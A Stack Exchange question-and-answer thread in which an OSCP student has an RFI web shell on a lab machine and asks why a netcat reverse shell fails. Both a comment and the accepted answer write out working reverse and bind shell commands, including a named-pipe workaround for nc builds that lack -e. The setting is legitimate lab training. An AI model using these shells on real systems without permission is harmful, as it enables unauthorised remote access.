0

I'm doing my OSCP certification. On one of the lab machines, I'm having a really hard time getting a reverse shell.

I scanned the machine and found port 80 open. I enumerated even more and found a RFI.
I uploaded a php web shell and it worked, command is running as apache user. Then I enumerated more and found netcat on the machine.

Now I want to have a shell to my attacking box. I tried using netcat as a reverse/bind shell and get nothing.

I tried different ports and nothing is working. When I scan with nmap ports like 6666, 4444, 5555 they are all filtered.

What am I doing wrong?

schroeder
  • 123,438
  • 55
  • 284
  • 319
Xozu
  • 63
  • 1
  • 3
  • 9
  • 7
    Doesn't this fall behind the *"Try harder"* motto? – WhiteWinterWolf Oct 04 '16 at 08:59
  • im trying harder for tow days – Xozu Oct 04 '16 at 09:19
  • what is the netcat command you're using to get the shell? – kaidentity Oct 04 '16 at 09:26
  • Try to get the output of nc -h and check if it has a -e option. Most nc's don't. Then you need to find another way. – kaidentity Oct 04 '16 at 09:39
  • @kaidentity for reverse shell: nc -nv [my ip add] 4444 -e /bin/sh in my kali im listeining with nc -lvp 4444 i can't get the output i treid it i just dont get anything :\ – Xozu Oct 04 '16 at 09:41
  • That is what I was suspecting. Most ncs in the OffSec lab (like most ncs in popular linux distros) don't support -e. It simply doesn't exist. Check out my answer (follows in a second). – kaidentity Oct 04 '16 at 09:44
  • Keep things simple. Check what other users are able to access the system. Perhaps they have sudo rights. – Jeroen Oct 04 '16 at 12:09
  • 4
    @ShaiAlfasi 2 days is nothing. You need to try harder. What you've done wrong is to discuss the details of the lab outside the lab environment. When I took the OSCP, this would have violated your terms. – schroeder Oct 04 '16 at 20:24

1 Answers1

10

Most ncs in the OffSec lab (like most ncs in popular linux distros) don't support -e. It simply doesn't exist.
The solution is to redirect the stdin/stdout communication through a pipe:

cd /tmp
mknod mypipe p
/bin/bash 0< /tmp/mypipe | nc -nlvp 4444 1> /tmp/mypipe

for a bind shell or

/bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe

for a reverse shell. Here is a full article about this.

Recently I found another nc on a Ubuntu 10.04 system where the above nc listener wouldn't have worked since nc didn't allow -l and p simultanously. So before panicking because the shell doesn't work you should first try to get the nc help or try to play with the various options (I tend to specify a lot of flags, maybe one should aim for as little as possible).

schroeder
  • 123,438
  • 55
  • 284
  • 319
kaidentity
  • 2,634
  • 13
  • 30
  • ho i feel so stupid i already read that but i ignord that, it works! thank you a lot ! – Xozu Oct 04 '16 at 09:55
  • Wow nice! I have seen this once before, but I didn't know why they were using backpipes. Well explained. I am going to try for my OSCP later this year so this is great to know. The only thing I would ask is please paste some of the content over into your answer from that article so as to keep in line with the stack exchange answer quality policies – DotNetRussell Oct 04 '16 at 13:32